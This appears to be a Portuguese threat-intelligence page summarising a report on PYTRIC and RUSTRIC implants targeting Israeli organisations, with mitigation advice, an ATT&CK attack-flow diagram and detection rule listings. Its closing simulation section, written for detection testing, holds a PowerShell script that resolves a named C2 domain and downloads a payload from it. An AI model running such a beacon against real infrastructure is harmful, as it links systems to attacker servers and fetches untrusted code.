Seguir
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O relatório descreve duas campanhas conectadas que utilizam documentos PDF e Word maliciosos para entregar cargas úteis que imitam ícones de antivírus e têm como alvo organizações israelenses. Um caminho instala o PYTRIC, um implante Python empacotado com PyInstaller, enquanto o outro entrega o RUSTRIC, um implante baseado em Rust lançado por meio de um documento Word com macro habilitada. Ambas as cargas coletam detalhes do host, executam comandos do sistema e investigam software de segurança instalado; o PYTRIC inclui, adicionalmente, funcionalidades destrutivas. A entrega é impulsionada por anexos phishing direcionados e links hospedados na nuvem (incluindo Dropbox), com uso do Telegram para comando e controle.
Investigação
O SEQRITE Labs analisou as iscas de phishing iniciais, extraiu macros incorporadas e reconstruiu a cadeia de carga útil instalada. O PYTRIC foi confirmado como um pacote PyInstaller com rotinas de descoberta de arquivos e apagamento, e os analistas observaram credenciais de bot do Telegram associadas ao Backup2040. O RUSTRIC foi caracterizado como um binário Rust que verifica vinte e oito produtos antivírus e aciona uma carga útil codificada em hexadecimal usando o WMI. A análise de infraestrutura conectou a entrega a um link Dropbox e a um domínio que resolve para um endereço IP anteriormente vinculado a netvigil.org.
Mitigação
Treine os usuários para tratarem anexos de PDF e Word não solicitados com cautela—especialmente arquivos apresentados como ferramentas de segurança ou utilitários relacionados a antivírus. Configure a segurança de e-mails para bloquear documentos com macros e para sinalizar ou restringir URLs que apontem para hosts de armazenamento em nuvem usados para entrega de cargas úteis. Nos endpoints, monitore a execução de PyInstaller, criação de processos WMI incomuns e invocações suspeitas de utilitários embutidos, como whoami, hostname e nslookup. Bloquear domínios e IPs maliciosos identificados pode interromper ainda mais o caminho da infecção.
Resposta
Se a atividade for detectada, isole o sistema afetado, preserve dados voláteis e colete os documentos maliciosos para triagem baseada em hash. Interrompa quaisquer processos gerados pelo WMI suspeitos e remova cargas úteis instaladas de locais comuns de preparo, como a pasta de Downloads. Realize validação forense para atividades de exclusão ou apagamento de arquivos, redefina credenciais potencialmente expostas e monitore comunicações subsequentes de C2 do Telegram.
“graph TB %% Definições de classes classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef file fill:#c2f0c2 classDef malware fill:#ff9999 classDef process fill:#dddddd classDef operator fill:#ff9900 %% Nós de Ação attack_phishing[“<b>Ação</b> – <b>T1566.001 Phishing: Spearphishing Attachment</b><br/>As vítimas recebem e-mail com anexo PDF ou Word malicioso.”] class attack_phishing action attack_user_exec[“<b>Ação</b> – <b>T1204.002 Execução pelo Usuário: Arquivo Malicioso</b><br/>A vítima abre o documento PDF ou Word malicioso, desencadeando a execução.”] class attack_user_exec action attack_ingress_transfer[“<b>Ação</b> – <b>T1105 Transferência de Ferramenta de Entrada</b><br/>O PDF instrui a vítima a baixar uma carga de segunda fase do Dropbox.”] class attack_ingress_transfer action attack_exec_python[“<b>Ação</b> – <b>T1059.006 Interpretador de Comandos e Scripts: Python</b><br/>PYTRIC (executável Python empacotado com PyInstaller) é executado no host.”] class attack_exec_python action attack_exec_vb[“<b>Ação</b> – <b>T1059.005 Interpretador de Comandos e Scripts: Visual Basic</b><br/>Macros VBA no documento Word decodificam e escrevem a carga final no disco.”] class attack_exec_vb action attack_masquerade[“<b>Ação</b> – <b>T1036.005 Disfarce: Corresponder Nome ou Localização Legítima</b><br/>Os binários são nomeados para imitar fornecedores de antivírus confiáveis (Check Point, SentinelOne).”] class attack_masquerade action attack_obfuscate[“<b>Ação</b> – <b>T1027 Arquivos ou Informações Ofuscados</b><br/>A carga é codificada em hexadecimal dentro da macro para evitar detecção estática.”] class attack_obfuscate action attack_proxy_exec[“<b>Ação</b> – <b>T1218 Execução por Proxy de Binário do Sistema</b><br/>Binários legítimos (wmic, whoami.exe, hostname.exe, nslookup.exe) são usados para executar comandos.”] class attack_proxy_exec action attack_wmi[“<b>Ação</b> – <b>T1047 Instrumentação de Gerenciamento do Windows</b><br/>RUSTRIC é iniciado via WMI (Win32_Process.Create).”] class attack_wmi action attack_sw_discovery[“<b>Ação</b> – <b>T1518.001 Descoberta de Software de Segurança</b><br/>RUSTRIC enumera 28 produtos antivírus/EDR verificando caminhos e processos conhecidos.”] class attack_sw_discovery action attack_process_discovery[“<b>Ação</b> – <b>T1057 Descoberta de Processo</b><br/>RUSTRIC lista processos em execução no endpoint.”] class attack_process_discovery action attack_c2_web[“<b>Ação</b> – <b>T1071.001 Protocolo da Camada de Aplicação: Protocolos Web</b><br/>Implantes comunicam-se com C2 por meio de protocolos web padrão.”] class attack_c2_web action attack_c2_port[“<b>Ação</b> – <b>T1571 Porta Não Padrão</b><br/>A comunicação ocorre sobre HTTPS na porta 443.”] class attack_c2_port action attack_subvert_trust[“<b>Ação</b> – <b>T1553 Subverter Controles de Confiança</b><br/>Os binários são disfarçados com ícones/marca de fornecedores de segurança legítimos.”] class attack_subvert_trust action attack_impair_defenses[“<b>Ação</b> – <b>T1562.011 Prejuízo às Defesas: Alertas de Segurança Falsos</b><br/>Alertas de segurança falsos reforçam a aparência confiável de binários maliciosos.”] class attack_impair_defenses action %% Nós de Ferramentas tool_wmic[“<b>Ferramenta</b> – <b>Nome</b>: wmic<br/><b>Descrição</b>: Utilitário de linha de comando da Instrumentação de Gerenciamento do Windows.”] class tool_wmic tool tool_whoami[“<b>Ferramenta</b> – <b>Nome</b>: whoami.exe<br/><b>Descrição</b>: Exibe o nome do usuário atual.”] class tool_whoami tool tool_hostname[“<b>Ferramenta</b> – <b>Nome</b>: hostname.exe<br/><b>Descrição</b>: Retorna o nome do host da máquina.”] class tool_hostname tool tool_nslookup[“<b>Ferramenta</b> – <b>Nome</b>: nslookup.exe<br/><b>Descrição</b>: Utilitário de consulta DNS.”] class tool_nslookup tool %% Nós de Arquivo file_malicious_pdf[“<b>Arquivo</b> – <b>Nome</b>: PDF Malicioso<br/><b>Finalidade</b>: Vetor de entrega para instrução inicial.”] class file_malicious_pdf file file_malicious_word[“<b>Arquivo</b> – <b>Nome</b>: Word Malicioso<br/><b>Finalidade</b>: Contém macro VBA que decodifica a carga final.”] class file_malicious_word file file_dropbox[“<b>Arquivo</b> – <b>Nome</b>: Link de carga do Dropbox<br/><b>Finalidade</b>: Hospeda o executável PYTRIC de segunda fase.”] class file_dropbox file %% Nós de Malware malware_pytric[“<b>Malware</b> – <b>Nome</b>: PYTRIC<br/><b>Descrição</b>: Backdoor Python empacotado com PyInstaller.”] class malware_pytric malware malware_rustric[“<b>Malware</b> – <b>Nome</b>: RUSTRIC<br/><b>Descrição</b>: Componente executado via WMI usado para descoberta e C2.”] class malware_rustric malware %% Nó de Operador para ramificação op_and1((“AND”)) class op_and1 operator %% Conexões attack_phishing u002du002d>|entrega| file_malicious_pdf attack_phishing u002du002d>|entrega| file_malicious_word file_malicious_pdf u002du002d>|aberto pela vítima| attack_user_exec file_malicious_word u002du002d>|aberto pela vítima| attack_user_exec attack_user_exec u002du002d>|dispara| attack_ingress_transfer attack_ingress_transfer u002du002d>|baixa| file_dropbox file_dropbox u002du002d>|fornece| malware_pytric attack_user_exec u002du002d>|executa| attack_exec_vb attack_exec_vb u002du002d>|escreve| malware_rustric attack_ingress_transfer u002du002d>|executa| attack_exec_python attack_exec_python u002du002d>|executa| malware_pytric malware_pytric u002du002d>|usa| attack_obfuscate malware_pytric u002du002d>|usa| attack_masquerade attack_obfuscate u002du002d>|suporta| attack_proxy_exec attack_masquerade u002du002d>|suporta| attack_proxy_exec attack_proxy_exec u002du002d>|chama| tool_wmic attack_proxy_exec u002du002d>|chama| tool_whoami attack_proxy_exec u002du002d>|chama| tool_hostname attack_proxy_exec u002du002d>|chama| tool_nslookup tool_wmic u002du002d>|inicia| attack_wmi attack_wmi u002du002d>|executa| malware_rustric malware_rustric u002du002d>|executa| attack_sw_discovery malware_rustric u002du002d>|executa| attack_process_discovery attack_sw_discovery u002du002d>|alimenta| attack_c2_web attack_process_discovery u002du002d>|alimenta| attack_c2_web attack_c2_web u002du002d>|usa| attack_c2_port attack_c2_web u002du002d>|habilita| attack_subvert_trust attack_c2_web u002du002d>|habilita| attack_impair_defenses %% Estilo class attack_phishing,attack_user_exec,attack_ingress_transfer,attack_exec_python,attack_exec_vb,attack_masquerade,attack_obfuscate,attack_proxy_exec,attack_wmi,attack_sw_discovery,attack_process_discovery,attack_c2_web,attack_c2_port,attack_subvert_trust,attack_impair_defenses action class tool_wmic,tool_whoami,tool_hostname,tool_nslookup tool class file_malicious_pdf,file_malicious_word,file_dropbox file class malware_pytric,malware_rustric malware class op_and1 operator “
Fluxo de Ataque
Detecções
Possível Abuso de Telegram como Canal de Comando e Controle (via dns_query)
Ver
Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via dns)
Ver
Possível Enumeração de Sistema (via cmdline)
Ver
IOCs (SourceIP) para detectar: UNG0801: Acompanhamento de Grupos de Ameaças obcecados por Falsificação de Ícone de AV visando Israel
Ver
IOCs (DestinationIP) para detectar: UNG0801: Acompanhamento de Grupos de Ameaças obcecados por Falsificação de Ícone de AV visando Israel
Ver
IOCs (HashSha256) para detectar: UNG0801: Acompanhamento de Grupos de Ameaças obcecados por Falsificação de Ícone de AV visando Israel
Ver
Comunicação C2 Usando Domínio e IP Específicos [Conexão de Rede do Windows]
Ver
Detecção de Execução de PDF Malicioso e Implante na Operação IconCat [Criação de Processo do Windows]
Ver
Execução de Simulação
Pré-requisito: O Check de Pré-voo de Telemetria e Linha de Base deve ter passado.
Racional: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa de Ataque & Comandos:
O adversário pré-registrou o domínio stratioai.org e o configurou para resolver para 159.198.68.25 (um servidor VPS comprometido). Usando um comando PowerShell de uma linha, eles iniciam um beacon C2 que baixa uma pequena carga útil e então mantém uma shell reversa persistente. A conexão de saída é feita sobre HTTPS (porta 443) para se misturar ao tráfego normal, mas os logs do firewall registram o IP de destino e a consulta DNS, satisfazendo a regra sigma. -
Script de Teste de Regressão:
# ------------------------------------------------- # Beacon C2 simulado para validação de detecção # ------------------------------------------------- # 1. Resolva o domínio malicioso (força consulta DNS) $maliciousDomain = "stratioai.org" $resolved = [System.Net.Dns]::GetHostAddresses($maliciousDomain) Write-Host "Resolved $maliciousDomain to $($resolved -join ', ')" # 2. Estabeleça conexão HTTPS com o IP malicioso (C2) $maliciousIP = "159.198.68.25" $url = "https://$maliciousDomain/payload.bin" try { $response = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10 Write-Host "C2 request succeeded, size: $($response.ContentLength) bytes" } catch { Write-Error "C2 request failed: $_" } # 3. OPCIONAL: Mantenha o canal aberto por 30 segundos Start-Sleep -Seconds 30 # ------------------------------------------------- -
Comandos de Limpeza:
# Remova quaisquer arquivos temporários (nenhum criado neste script) # Limpe o cache DNS para evitar reutilização acidental ipconfig /flushdns Write-Host "Limpeza completa."